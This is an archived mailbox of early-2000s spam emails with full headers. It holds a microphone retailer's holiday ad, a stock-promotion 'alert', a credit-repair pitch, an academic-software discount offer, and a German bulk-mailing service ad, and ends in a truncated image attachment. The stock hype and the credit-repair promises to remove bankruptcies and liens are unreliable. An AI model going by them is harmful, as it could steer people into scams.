/ <a href="http://www.micguys.com/accessories/acc_stands.htm">Stands</a> 
/ <a href="http://www.micguys.com/accessories/acc_miccables.htm">Mic Cables</a> 
/ <a href="http://www.micguys.com/">Monitors</a> / <a href="http://www.micguys.com/accessories/accessories.htm">Microphone 
Accessories</a> / <a href="http://www.micguys.com/">Pre Amps</a> / <a href="http://www.micguys.com/ps_audio/ps_audio.htm">A.C. 
Solutions</a></font></font></font></b></center> 
</td> 
</tr> 
</table> 
<center><table BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="100%" HEIGHT="20" NOSAVE > 
<tr NOSAVE> 
<td WIDTH="100%" NOSAVE> 
<br>&nbsp; 
<table BORDER=0 COLS=3 WIDTH="400" NOSAVE > 
<tr NOSAVE> 
<td NOSAVE> 
<center><img SRC="http://www.micguys.com/e-mail_blasts/ctree_6a.gif" NOSAVE height=106 width=70></center> 
</td> 
<td WIDTH="80%" NOSAVE> 
<center><b><font face="Arial"><font color="#009900"><font size=-1>HAPPY 
HOLIDAYS FROM MICGUYS.COM!</font></font></font></b></center> 
<p><b><font face="Arial"><font size=-1>Thanks for being&nbsp; part of the 
Micguys.com family!&nbsp; In an effort to better serve our customers needs,&nbsp; 
we are always on the lookout for new and unique products that we feel offer 
great value for the price. We are always adding new products so visit us 
often at&nbsp; <a href="http://www.micguys.com">Micguys.com</a>.</font></font></b></td> 
<td> 
<center><img SRC="http://www.micguys.com/e-mail_blasts/ctree_6a.gif" NOSAVE height=106 width=70></center> 
</td> 
</tr> 
</table> 
</td> 
</tr> 
</table></center> 
<br>&nbsp; 
<table BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="500" NOSAVE > 
<tr NOSAVE> 
<td WIDTH="100%" NOSAVE> 
<center><b><i><font color="#000000"><font size=+2>Musicians...&nbsp; Look 
At This Deal!</font></font></i></b></center> 
</td> 
</tr> 
</table> 
<table BORDER=0 CELLSPACING=0 WIDTH="495" BGCOLOR="#CCCC99" > 
<tr> 
<td WIDTH="495"> 
<table BORDER=0 CELLSPACING=0 CELLPADDING=4 WIDTH="493" BGCOLOR="#CCCC99" > 
<tr> 
<td ALIGN=LEFT VALIGN=TOP WIDTH="491" BGCOLOR="#FFFFFF"><img SRC="http://www.micguys.com/e-mail_blasts/tb1_mail2.jpg" NOSAVE height=300 width=87 align=LEFT><b><font color="#000000"><font size=+2><a href="http://www.micguys.com/studio_project_mics/spmics_tb1.htm">Studio 
Projects TB-1</a></font></font><font color="#FF0000"><font size=+1>&nbsp; 
$299.99</font></font></b> 
<br><b><i><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#000000"><font size=+1>Get 
That Warm Tube Sound At An Incredible Price!&nbsp;</font></font></font></i></b> 
<br><b><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#000000"><font size=-1>These 
mics are in high demand and are hard to find!&nbsp;</font></font></font></b> 
<br><b><font face="verdana,geneva,arial,helvetica,sans-serif"><font size=-1><font color="#000000">There 
is Limited Stock on hand, so </font><font color="#FF0000">Order Now!</font></font></font></b> 
<br><font face="Arial"><font size=-1>The TB1 is a vacuum tube (valve) microphone 
incorporating the philosophy that the best microphones use high quality, 
yet minimal components, along with hand selected tubes. Using the finest 
available materials to build the best possible capsule, the Studio Projects 
TB1 achieves this philosophy and more.&nbsp;</font></font><img SRC="http://www.micguys.com/e-mail_blasts/tb1_case_small.jpg" NOSAVE height=132 width=126 align=RIGHT> 
<blockquote><b><font color="#000000"><font size=-1>APPLICATIONS:</font></font></b> 
<br><font color="#000000"><font size=-1>* A superb vocal microphone with 
warm natural transparent character</font></font> 
<br><font color="#000000"><font size=-1>* Great for strings, pianos &amp; 
percussion</font></font> 
<br><font color="#000000"><font size=-1>* Great for production, broadcast, 
and voice over work</font></font> 
<br><font color="#000000"><font size=-1>* Perfect for the professional 
and home project studio&nbsp;</font></font> 
<br><b><font color="#000000"><font size=-1>SUPPLIED ACCESSORIES:</font></font></b> 
<br><font color="#000000"><font size=-1>* Foam windscreen</font></font> 
<br><font color="#000000"><font size=-1>* Mic Stand Clip</font></font> 
<br><font color="#000000"><font size=-1>* 7pin interface cable</font></font> 
<br><font color="#000000"><font size=-1>* Power supply</font></font> 
<br><font color="#000000"><font size=-1>* Aluminum carrying case</font></font></blockquote> 
</td> 
</tr> 
</table> 
</td> 
</tr> 
</table> 
<br>&nbsp; 
<table BORDER=0 CELLSPACING=0 WIDTH="495" BGCOLOR="#CCCC99" > 
<tr> 
<td WIDTH="495"> 
<table BORDER=0 CELLSPACING=0 CELLPADDING=4 WIDTH="493" BGCOLOR="#CCCC99" > 
<tr> 
<td ALIGN=LEFT VALIGN=TOP WIDTH="491" BGCOLOR="#FFFFFF"><b><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#000000"><font size=+2>Stocking 
Stuffers!</font></font></font></b> 
<br><b><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#000000">You 
Better Have Enough </font><font color="#FF0000">Cables!</font></font></b> 
<br><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#444444"><font size=-1><a href="http://www.micguys.com/accessories/acc_miccables.htm">We 
have a variety of cables in different lengths to help wire you up!&nbsp; 
(click here)</a></font></font></font> 
<p><b><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#000000">Got 
Enough Stands?</font></font></b> 
<br><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#000000"><font size=-1><a href="http://www.micguys.com/accessories/acc_stands.htm">Always 
be prepared with the stands necessary to mic any situation. Take a look 
at our selection of stands for a variety of applications.</a></font></font></font> 
<br>&nbsp;</td> 
</tr> 
</table> 
</td> 
</tr> 
</table> 
<br>&nbsp; 
<table BORDER=0 CELLSPACING=0 WIDTH="495" BGCOLOR="#CCCC99" > 
<tr> 
<td WIDTH="495"> 
<table BORDER=0 CELLSPACING=0 CELLPADDING=4 WIDTH="493" BGCOLOR="#CCCC99" > 
<tr> 
<td ALIGN=LEFT VALIGN=TOP WIDTH="491" BGCOLOR="#FFFFFF"><b><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#000000">Check 
out our great selection of other instrument mics:</font></font></b> 
<p><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#000000"><font size=-1><a href="http://www.micguys.com/marshall/marsh_603s.htm">Marshall 
603s</a> - a great overhead mic for drums or stringed instruments.</font></font></font> 
<br><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#000000"><font size=-1><a href="http://www.micguys.com/studio_project_mics/spmics_c1.htm">Studio 
Projects C1</a> - The new workhorse for the new millennium...</font></font></font> 
<br><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#000000"><font size=-1><a href="http://www.micguys.com/adk/adk_a-51.htm">ADK 
A51</a> - A large diaphragm condenser that will give Neumanns a run for 
their money.</font></font></font> 
<br><font face="verdana,geneva,arial,helvetica,sans-serif"><font color="#000000"><font size=-1><a href="http://www.micguys.com/blue/blue_mouse.htm">B.L.U.E. 
The Mouse</a> - Add a bit of flavor and style to your next recordings.</font></font></font> 
<p>&nbsp;</td> 
</tr> 
</table> 
</td> 
</tr> 
</table> 
<br>&nbsp; 
<table BORDER=0 CELLSPACING=0 WIDTH="495" BGCOLOR="#CCCC99" > 
<tr> 
<td WIDTH="495"> 
<table BORDER=0 CELLSPACING=0 CELLPADDING=4 WIDTH="493" BGCOLOR="#CCCC99" > 
<tr> 
<td ALIGN=LEFT VALIGN=TOP WIDTH="491" BGCOLOR="#FFFFFF"><font face="verdana,geneva,arial,helvetica,sans-serif"><font size=-2>If 
you wish to be removed from this mailing list, e-mail <a href="mailto:list@micguys.com">info@micguys.com</a> 
to be removed from the list.</font></font></td> 
</tr> 
</table> 
</td> 
</tr> 
</table> 
<br>&nbsp; 
<br>&nbsp; 
<br>&nbsp; 
</body> 
</html> 

------=_NextPart_000_0034_01C221EC.6C64F7B0--

From INVESTMENT_ALERT---99863@earthlink.net Mon Jan  6 19:13:19 2003
Return-Path: <INVESTMENT_ALERT---99863@earthlink.net>
Received: from 218.64.167.183 ([218.64.167.183])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with SMTP id h070DDjY002428
	for <blast-funct-archive@netlib2.cs.utk.edu>; Mon, 6 Jan 2003 19:13:16 -0500 (EST)
Message-Id: <200301070013.h070DDjY002428@netlib2.cs.utk.edu>
Received: from 36.185.61.158 ([36.185.61.158]) by f64.law4.hotmail.com with QMQP; Jan, 06 2003 6:03:09 PM -0700
Received: from [72.62.68.193] by rly-yk04.mx.aol.com with asmtp; Jan, 06 2003 4:55:03 PM +0400
Received: from 82.60.152.190 ([82.60.152.190]) by smtp4.cyberec.com with QMQP; Jan, 06 2003 3:51:09 PM +1200
From: INVESTMENT ALERT - 99685 <INVESTMENT_ALERT---99863@earthlink.net>
To: Subscriber.98594
Cc: 
Subject: STOCK MARKET ALERT - TBIN REPORTS RECORD REVENUES.99901
Sender: INVESTMENT ALERT - 99685 <INVESTMENT_ALERT---99863@earthlink.net>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Mon, 6 Jan 2003 18:18:26 -0600
X-Mailer: Microsoft Outlook Express 5.00.2615.200
X-Priority: 1

<html>
<head>
</head>
<body>
<p align="center"><font style="font-size: 11pt" face="Courier">TBIN Reports Record Revenues and Earnings - UP 309%</font></p>
<p align="center"><font style="font-size: 11pt" face="Courier">Get the whole story from "Live From the Street"</font></p>
<p align="center"><b><a href="http://www.marketingnewsletter.us/Live_From_the_Street_TBIN.htm">ENTER HERE</a></b></p>
<p align="center"><img border="0" src="http://www.marketingnewsletter.us/bm08.gif"></p>
<p align="left">&nbsp;</p>
<p align="left">&nbsp;</p>
<p align="center"><font size="2"><A href="http://www.famousoffers.com/remove/cstremove.htm">Click here to unsubscribe</A>
</body>
</html>

enejpsculawjbkg

From Credit_Doctor_1294@vail.net Mon Jan 20 20:32:55 2003
Return-Path: <Credit_Doctor_1294@vail.net>
Received: from 200.45.185.145 ([200.241.173.44])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with SMTP id h0L1WmVU029620
	for <blast-funct-archive@netlib2.cs.utk.edu>; Mon, 20 Jan 2003 20:32:50 -0500 (EST)
Message-Id: <200301210132.h0L1WmVU029620@netlib2.cs.utk.edu>
Received: from unknown (148.179.169.246) by rly-yk05.mx.aol.com with QMQP; Jan, 20 2003 7:03:39 PM +0700
Received: from [26.84.34.94] by smtp4.cyberec.com with smtp; Jan, 20 2003 6:20:50 PM -0200
Received: from [110.188.46.152] by mta05bw.bigpond.com with QMQP; Jan, 20 2003 5:15:51 PM -0700
Received: from unknown (HELO rly-xw01.mx.aol.com) (96.213.243.25) by n9.groups.yahoo.com with asmtp; Jan, 20 2003 4:04:55 PM +0700
From: Patrick <Credit_Doctor_1294@vail.net>
To: Hervey
Cc: 
Subject: We Can Fix Your Credit..... nqgu
Sender: Patrick <Credit_Doctor_1294@vail.net>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Mon, 20 Jan 2003 19:32:07 -0600
X-Mailer: Microsoft Outlook Build 10.0.2627

<p align="center"><img border="0" src="http://www.cjlinc.net/CJ01.gif" width="501" height="64"></p>
<p>We can fix your credit.  We are very successful at getting 
bankruptcies, judgments, tax liens, foreclosures, late payments, charge-offs, 
repossessions, and even student loans removed from a persons credit report.  To find out more go to
<a href="http://www.cjlinc.net">http://www.cjlinc.net</a>.</p>
<p>If you no longer want to receive information from us just go to 
<a href="mailto:tallrhe@cs.com">tallrhe@cs.com</a>.<p>
&nbsp;

bsmwxwjeywjnogfehkoxfaxilaccb

From academic-discounts@yahoo.com Mon Feb  3 19:59:51 2003
Return-Path: <academic-discounts@yahoo.com>
Received: from mail.starvi.com ([211.144.5.2])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with ESMTP id h140xkaN017157
	for <blast-funct-archive@netlib2.cs.utk.edu>; Mon, 3 Feb 2003 19:59:49 -0500 (EST)
Received: from smtp0211.mail.yahoo.com [66.59.166.29] by mail.starvi.com with ESMTP
  (SMTPD32-6.06) id A03A9EA00EC; Tue, 04 Feb 2003 08:58:34 +0800
Date: Tue, 4 Feb 2003 01:01:58 GMT
From: "Leon Oscar"<academic-discounts@yahoo.com>
X-Priority: 3
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: FW: Deep  Education  Software  Discounts                                          
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20030204085846.SM00748@smtp0211.mail.yahoo.com>

Check this out - They've got great deals on Adobe products.  Best.

Adobe Photoshop at 54% OFF, 
Macromedia Studio MX at 76% OFF, 
Adobe Design Collection at 62% OFF
Microsoft Visual Studio.NET at 91% OFF,
Office XP Standard at 70% OFF,

FREE SHIPPING THROUGH FEBRUARY 28, 2003 WITH BELOW CODE.
FREE SHIPPING CODE (Ground Only): BRK584 
YOU MUST PLACE ORDER BY TELEPHONE AND YOU MUST TELL OUR OPERATOR THAT YOU HAVE A FREE SHIPPING CODE.

Dear Students, Teachers, Faculty, Staff and Schools:

COMPUTER PRODUCTS FOR EDUCATION is pleased to offer to you the best prices on ACADEMIC EDITION SOFTWARE from MICROSOFT, ADOBE, MACROMEDIA, COREL, and others - AT UP TO 91% OFF STANDARD COMMERCIAL RETAIL PRICES.  If you are a Qualified Education Buyer (defined below) you can purchase software products from CPE at HUGE DISCOUNTS - year-round!

Qualified Education Buyers include K-12 and HIGHER EDUCATION STUDENTS, TEACHERS, FACULTY, STAFF, and SCHOOLS.

Call 800-679-7007 to order any of these products.

For our website address, please send a blank email here:  
Mailto:124ujijk@gmx.de?subject=MORE%20INFO 
You will receive a response with our web address.

----------------------           Education Standard  You
ADOBE (Windows & Mac):             Price    Retail   Save!
----------------------           ---------  ------   -----
Acrobat 5.0                        $57.95    $249     77%
After Effects 5.5                 $289.95    $649     55%
GoLive 6.0/LiveMotion 2.0          $84.95    $399     79%
Illustrator 10.0                   $89.95    $399     77%
InDesign 2.0                      $189.95    $699     73%
PageMaker 7.0                     $279.95    $499     44%
PageMaker 7.0 Upgrade              $89.95      -       -
Photoshop 7.0                     $279.95    $609     54%
Photoshop 7.0 Upgrade             $149.95      -       -
Premiere 6.5                      $224.95    $549     59%
Premiere 6.5 Upgrade              $149.95      -       -

*******Adobe Collections**********
Design Collection 6.0             $379.95    $999     62%
    (InDesign 2/Photoshop 7/Illustrator 10/Acrobat 5)
Digital Video Collection 8.0      $489.95   $1199     60%
    (Premiere 6.5/AfterEffects 5.5/Photoshop 7/Illustr 10)
Publishing Collection 12.0        $489.95    $999     51%
    (PageMaker 7/Photoshop 7/Illustrator 10/Acrobat 5)
Web Collection 6.0                $389.95    $999     61%
    (Photoshop 7/Illustrator 10/GoLive 6/Acrobat 5)   


Call 800-679-7007 to order any of the products below.

----------------------           Education Commercial You
MACROMEDIA (Windows & Mac):        Price    Retail   Save!
----------------------           ---------  ------   -----
Authorware 6.5 E-Doc              $349.95   $2699     87%
ColdFusion MX Server Pro          $529.95    $799     34%
Director MX                       $479.95   $1199     60%
Dreamweaver MX                     $98.95    $299     67%
eLearning Studio                  $489.95   $2999     84%
   (Authorware 6/FlashMX/DreamweaverMX)
Fireworks MX                       $98.95    $199     50%
Flash MX                           $98.95    $399     75%
FreeHand 10                        $98.95    $399     75%
STUDIO MX                         $189.95    $799     76%
  (Dreamweaver MX/Fireworks MX/Flash MX/Freehand 10/ColdFusion MX)

Call 800-679-7007 to order any of the products below.

---------------------------      Education Standard  You
Microsoft:                         Price    Retail   Save!
---------------------------      ---------  ------   -----
Office XP Standard                $148.95    $479     70%
Office XP Professional            $199.95    $579     66%
Office 2001 Macintosh             $209.95    $499     60%
Office Mac v.X for Mac OS X       $215.95    $459     53% 
FrontPage 2002                     $79.95    $169     53%
Publisher 2002                     $79.95    $129     38%
Visio Standard 2002                $69.95    $199     65%
Visio Professional 2002           $159.95    $499     69%
Visual Basic.Net Standard          $59.95    $109     45%
Visual C++.Net Standard            $59.95    $109     45%
Visual C#(sharp).Net Standard      $59.95    $109     45%
Visual Studio.Net Professional     $98.95   $1079     91%
Windows XP Professional Upg*      $ 94.95    $299     68%
Windows 2000 Professional Upg*    $129.95    $319     59%

* Windows XP/2000 Pro Upgrade will install on a blank hard drive. 

Call 800-679-7007 to order any of the products below.

---------------------------      Education Standard  You
Corel:                             Price    Retail   Save!
---------------------------      ---------  ------   -----
Wordperfect Office 2002 w/Voice    $99.95    $389     74%
Corel Draw 11.0                   $142.95    $549     72%
Procreate Painter 7.0             $229.95    $549     60%

Call 800-679-7007 to order any of the products below.

For our website address, please send a blank email here:  
Mailto:124ujijk@gmx.de?subject=MORE%20INFO 
You will receive a response with our web address.

PURCHASE ORDERS MAY BE FAXED TO: 800-679-6996
REFERENCE THE FREE SHIPPING CODE ON YOUR PURCHASE ORDER
FOR FREE SHIPPING.

----------
LICENSING:
----------
For school purchases of five to ten (5-10) or more units, depending on the product, please call 800-679-7007 for even deeper discounts on license packs.   
----------
For hundreds of other software products available from CPE at similar discounts, call us at 800-679-7007. 

Academic Edition software is exactly the same as the Full-Retail version except that it has been deeply discounted for Qualified Education Buyers.  

No verification is required for purchases of Microsoft Office XP Standard.  

For all other products, purchasers must provide fax-verification of status as being a current faculty, staff, or student.  After placing your order, you simply fax to CPE either: (a) a copy of a current picture School I.D. Card or, (b) a current paycheck stub with an alternative picture I.D. (drivers license, etc.).  Schools may purchase by faxing a valid school purchase order.  For more details, call us for our website address.

All software sold by CPE is authentic original software from the manufacturer.  THESE ARE NOT PIRATED COPIES.  ALL SOFTWARE COMES IN ORIGINAL MANUFACTURER'S BOXES AND INCLUDES A VALID LICENSE.

CPE is an Authorized Education Reseller for Microsoft, Adobe, Corel, Symantec and many other major software manufacturers. CPE is the only national software distributor committed to providing the lowest prices EXCLUSIVELY to the Education community with the best customer service.

All prices and availability are subject to change without notice.  

FREE SHIPPING (GROUND ONLY) through FEBRUARY 28, 2003, on any order when you present the above FREE SHIPPING CODE to our operator at the time of placing your order. You must place the order by phone or purchase order in order to receive free shipping. 

___________________

We hope you find this message valuable.  If you do not wish to receive any more special offers and updates, please send an email to:  Mailto:124ujijk@gmx.de?subject=REMOVE 
___________________

THANK YOU!

From stendd@tiscali.de Thu Feb 13 19:06:32 2003
Return-Path: <stendd@tiscali.de>
Received: from webmail.tiscali.de ([62.27.55.1])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with ESMTP id h1E06VaN006849
	for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 13 Feb 2003 19:06:32 -0500 (EST)
Received: from ultraknall (213.54.15.135) by webmail.tiscali.de (6.0.045)
        id 3E3788DF005F3738 for blast-funct-archive@netlib2.cs.utk.edu; Fri, 14 Feb 2003 00:54:34 +0100
Message-ID: <3E3788DF005F3738@eagle.intern.zoo.tiscali.de> (added by postmaster@webmail.tiscali.de)
From: "steven" <stendd@tiscali.de>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Test-Angebot
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
Reply-To: stendd@tiscali.de
Date: Fri, 14 Feb 2003 01:07:02 +0100
Mime-Version: 1.0
Content-Type: multipart/related;
	boundary="----=_NextPart_000_01AC_01C2D37F.9153A2C0";
	type="multipart/alternative"


This is a multi-part message in MIME format.

------=_NextPart_000_01AC_01C2D37F.9153A2C0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_001_01AD_01C2D37F.9153A2C0"


------=_NextPart_001_01AD_01C2D37F.9153A2C0
Content-Type: text/plain;
	charset="utf-8"
Content-Transfer-Encoding: quoted-printable



Sehr geehrte Damen und Herren,

ab sofort k=C3=B6nnen Sie eventuelle Versandauftr=C3=A4ge f=C3=BCr =
Werbemails=20

nocheinmal verifizieren und konkretisieren.

Test-Angebot

Desweiteren teilen wir mit, dass es uns gelungen ist, einen namhaften =
belorussischen Provider f=C3=BCr unser System zu gewinnen,

durch den es uns nunmehr m=C3=B6glich ist, in noch k=C3=BCrzerer Zeit =
noch mehr Emails zu versenden. In diesem Zusammenhang sei weiterhin

bemerkt, dass sich unser Adresspotential auf nunmehr ca. 350.000.000 =
bel=C3=A4uft.



MfG

Steven Langer
-Bulkservice/ T&S-

http://www.thomas-stevens.biz/email/index.htm

P.S.: Sollten Sie in Zukunft nicht mehr von uns kontaktiert werden =
wollen, so teilen Sie uns dies bitte kurz mit.

info@thomas-stevens.biz







------=_NextPart_001_01AD_01C2D37F.9153A2C0
Content-Type: text/html;
	charset="utf-8"
Content-Transfer-Encoding: quoted-printable

=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3Dutf-8">
<META content=3D"MSHTML 6.00.2600.0" name=3DGENERATOR>
<STYLE>BODY {
	MARGIN-TOP: 5px; FONT-SIZE: 10pt; MARGIN-LEFT: 30px; COLOR: #333399; =
FONT-FAMILY: Trebuchet MS, Verdana
}
IMG {
	MARGIN-TOP: 5px; MARGIN-LEFT: -30px
}
</STYLE>
</HEAD>
<BODY background=3Dcid:01ab01c2d377$2f8c2d80$15eefea9@ultraknall>
<DIV><STRONG><EM><FONT face=3DArial color=3D#000000><IMG=20
src=3D"http://www.thomas-stevens.biz/email/Thomaslog.gif?1289BB23" =
border=3D0=20
editor=3D"Webstyle3"></FONT></EM></STRONG></DIV>
<DIV><STRONG><EM><FONT face=3DArial=20
color=3D#000000></FONT></EM></STRONG>&nbsp;</DIV>
<DIV><STRONG><EM><FONT face=3DArial color=3D#000000>Sehr geehrte Damen =
und=20
Herren,</FONT></EM></STRONG></DIV>
<DIV><STRONG><EM><FONT face=3DArial=20
color=3D#000000></FONT></EM></STRONG>&nbsp;</DIV>
<DIV><STRONG><EM><FONT face=3DArial color=3D#000000>ab sofort =
k=C3=B6nnen Sie eventuelle=20
Versandauftr=C3=A4ge f=C3=BCr Werbemails </FONT></EM></STRONG></DIV>
<DIV><STRONG><EM><FONT face=3DArial=20
color=3D#000000></FONT></EM></STRONG>&nbsp;</DIV>
<DIV><STRONG><EM><FONT face=3DArial color=3D#000000>nocheinmal =
verifizieren und=20
konkretisieren.</FONT></EM></STRONG></DIV>
<DIV><STRONG><EM><FONT face=3DArial=20
color=3D#000000></FONT></EM></STRONG>&nbsp;</DIV>
<DIV align=3Dcenter><SPAN style=3D"TEXT-DECORATION: overline"><FONT =
size=3D5><B><I><A=20
href=3D"http://www.thomas-stevens.biz/email/testbulk.htm">Test-Angebot</A=
></I></B></FONT></SPAN></DIV>
<DIV><STRONG><EM><FONT face=3DArial=20
color=3D#000000></FONT></EM></STRONG>&nbsp;</DIV>
<DIV><STRONG><EM><FONT face=3DArial color=3D#000000>Desweiteren teilen =
wir mit, dass=20
es uns gelungen ist, einen namhaften belorussischen Provider f=C3=BCr =
unser System zu=20
gewinnen,</FONT></EM></STRONG></DIV>
<DIV><STRONG><EM><FONT face=3DArial=20
color=3D#000000></FONT></EM></STRONG>&nbsp;</DIV>
<DIV><STRONG><EM><FONT face=3DArial color=3D#000000>durch den es uns =
nunmehr m=C3=B6glich=20
ist, in noch k=C3=BCrzerer Zeit noch mehr Emails zu versenden. In diesem =
Zusammenhang=20
sei weiterhin</FONT></EM></STRONG></DIV>
<DIV><STRONG><EM><FONT face=3DArial=20
color=3D#000000></FONT></EM></STRONG>&nbsp;</DIV>
<DIV><STRONG><EM><FONT face=3DArial color=3D#000000>bemerkt, dass sich =
unser=20
Adresspotential auf nunmehr ca. 350.000.000 =
bel=C3=A4uft.</FONT></EM></STRONG></DIV>
<DIV><STRONG><EM><FONT face=3DArial=20
color=3D#000000></FONT></EM></STRONG>&nbsp;</DIV>
<DIV><STRONG><EM><FONT face=3DArial=20
color=3D#000000></FONT></EM></STRONG>&nbsp;</DIV>
<DIV><STRONG><EM><FONT face=3DArial=20
color=3D#000000></FONT></EM></STRONG>&nbsp;</DIV>
<DIV><STRONG><EM><FONT face=3DArial =
color=3D#000000>MfG</FONT></EM></STRONG></DIV>
<DIV><STRONG><EM><FONT face=3DArial=20
color=3D#000000></FONT></EM></STRONG>&nbsp;</DIV>
<DIV><STRONG><EM><FONT face=3DArial color=3D#000000>Steven=20
Langer</FONT></EM></STRONG></DIV>
<DIV><STRONG><EM><FONT face=3DArial color=3D#000000>-Bulkservice/=20
T&amp;S-</FONT></EM></STRONG></DIV>
<DIV><STRONG><EM><FONT face=3DArial=20
color=3D#000080></FONT></EM></STRONG>&nbsp;</DIV>
<DIV><STRONG><EM><FONT face=3DArial color=3D#000080><A=20
href=3D"http://www.thomas-stevens.biz/email/index.htm">http://www.thomas-=
stevens.biz/email/index.htm</A></FONT></EM></STRONG></DIV>
<DIV><STRONG><EM><FONT face=3DArial=20
color=3D#000000></FONT></EM></STRONG>&nbsp;</DIV>
<DIV><STRONG><EM><FONT face=3DArial color=3D#000000>P.S.: Sollten Sie in =
Zukunft=20
nicht mehr von uns kontaktiert werden wollen, so teilen Sie uns dies =
bitte kurz=20
mit.</FONT></EM></STRONG></DIV>
<DIV><STRONG><EM><FONT face=3DArial=20
color=3D#000000></FONT></EM></STRONG>&nbsp;</DIV>
<DIV><STRONG><EM><FONT face=3DArial color=3D#000000><A=20
href=3D"mailto:info@thomas-stevens.biz">info@thomas-stevens.biz</A></FONT=
></EM></STRONG></DIV>
<DIV><STRONG><EM><FONT face=3DArial=20
color=3D#000000></FONT></EM></STRONG>&nbsp;</DIV>
<DIV><STRONG><EM><FONT face=3DArial=20
color=3D#000000></FONT></EM></STRONG>&nbsp;</DIV>
<DIV><STRONG><EM><FONT face=3DArial=20
color=3D#000000></FONT></EM></STRONG>&nbsp;</DIV>
<DIV><STRONG><EM><FONT face=3DArial=20
color=3D#000000></FONT></EM></STRONG>&nbsp;</DIV>
<DIV><STRONG><EM><FONT face=3DArial=20
color=3D#000000></FONT></EM></STRONG>&nbsp;</DIV>
<DIV><STRONG><EM><FONT face=3DArial=20
color=3D#000000></FONT></EM></STRONG>&nbsp;</DIV></BODY></HTML>

------=_NextPart_001_01AD_01C2D37F.9153A2C0--

------=_NextPart_000_01AC_01C2D37F.9153A2C0
Content-Type: application/octet-stream;
	name="Thomaslog.gif?1289BB23"
Content-Transfer-Encoding: base64
Content-Location: http://www.thomas-stevens.biz/email/Thomaslog.gif?1289BB23

R0lGODdhuABjALMAAP///9De46zS5H+Af77Y4rXW5MXb47O8v77Hy+nx9N3n6/f395aYmKWpqYqM
i1xoSywAAAAAuABjAAAE/xDISau9OK8FUgoGgYwkIhpBoGwAl71wLM90bd942wUFcvzAoBDoIygS
upxyyWw6ZZxFgnDwDX0IAaJHIIS6otHPtHqaz+i0ZRMQDMddlEExT6VQ9nsgjAhsXGqBgoMXHAkF
QlYFXnd0eioodI5ydgYhJgkshJucZwpUV5aSeY14eJWjonldSJ2urzZTY0QFlaSOkJKnILwpuL2W
Aa2wxMUSGwZWQQSoeru9ILpzdXnTCtHRZcbbnQluQrWPdrq85I+/4rbjHtztgQsBoc3QzXLXvqTz
pvd4R5nuAJ0swAJEQKRd06qlM5Wv4a+DvDwACkiRhpQD38YEE/Us4TVqDf/pIax2D5uKfxVTwrg4
60CBa6MgjYMYsqbNhgc9DFPJk4ICZT/kbKTEayiwo0eJngoGrCQInT2jAogXpI8KBVizat3KtatX
rVe3PjpoAKrUlArAoSigs63bt3Djyn3r1Ig9YVLOUkyLccy4IxCXykyn7qbhXEsl6nWnICPGpgkm
lQSJ004XEyREXDbBBbPmZFZJ1VG82NjAqv1QeBC90CaWLCMQjdBSgnbsACOWJizLrnQxoKGjzflQ
p7jTkPcOGEFXvFLxyHv6GC9l1rcrqlUOMMTjIRjzmpdyl/Vn6RSuScLo5M5nDe9O64MS9P3BTPjH
Ix8Jk+pSNVyvyN9R94H/CEWNFU0mE8GnxmkFFSUUVglAhE4lVmzhBWD4eEfHSBHRcQIuCeVRnYJp
wFOVffYMd98zlmkkykvQ9XKfTAw9dc0ISE1T3hF5kViiYxsJJwqGM1UDBDMMdecLiwrpAR0VD9bi
3Rxs9TZIgj0BVYCOzigAY34i+SAACFHiR4lQ1Zy5x5PSlcIlHlK85yMT8hHx4JlzAHbPQxoJ6SWE
1lCDHpkFQrfenTrKIZGcc+aQxZFMrbXhnx+IRNWW5Rnw0qb4NdkQkikQwCaiQ02aCaONxoJamVKq
Rhw6RRxEjiVKzpRiL9Kpph4CQ1kTjlA6YZlqDYgA8VKkPEwK42ChBpVp/6bHmgniZJMhOR4PW0xa
3rFn8ojqsDEskJ0b9tRSi5eZ1kqhcn5yRGulNNW0pY248frsn70ORxq4NRiwzLNUvihJjHb4gCnA
977KHjanaDdcdAI/myy3i/JrgzImUIluouV54F8Kse6IqZdk6hkYs7jEUSkVZGa6IcLernHMH5q0
EMXNLgibUp0/CLAxx9B22uLIlnCrsYqiHbcfr6ttsWPQnHJ6as40V2311VhHkRIozr4sMLeA5hEy
wtAqSZSBuyiH1R4Ou0x2x1NnLffcV1M0n71vb/tlL84W/efBO74a4nTQbGEo3tB+/fcKEmW9wgIr
YAX55JHT/Yc74hqbt//b6saD+Obd/TLhkqEigNUlXigOuMsIZvLV619NnjU3fFXxbNQA791s6jAD
DF2IY01LxeGJI7x6XrB/FVbsj9f9Gy25v5jwKVTwHn26ERbpyOggHLA2lJsH3HGcSvdhPm4/rZ28
VrJXXUxGBt2+4erLtmj9trmbyZp+3Z/uNNmr21bjzFeCEtSrgCSoV/pM55UNNE9ngwgCpgAXQLid
YgRxeNvBTCa61DCLDGyj3/XgJgUEFnAMrzEhjky3PPY9EIJq4NnnALgtobGteAAU2j5qJBrtXOME
